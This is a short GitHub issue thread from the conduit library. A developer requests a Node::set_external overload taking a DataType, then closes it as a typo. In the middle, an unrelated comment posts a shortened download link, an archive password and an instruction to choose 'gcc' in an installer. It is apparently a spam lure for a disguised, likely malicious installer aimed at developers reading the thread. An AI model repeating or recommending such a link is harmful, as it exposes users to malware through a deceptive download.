### ISSUE TITLE
Add Node::set_external(void *, conduit::DataType &dtype)

### ISSUE THREAD

**Issue by cyrush** [LLNL/conduit#1321]
For leaf use cases, which currently require:

```
 data.set_external(ptr,conduit::Schema(dtype);
```

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by cyrush** [comment]
This exists, I was blocked on a typo. sorry for the noise.
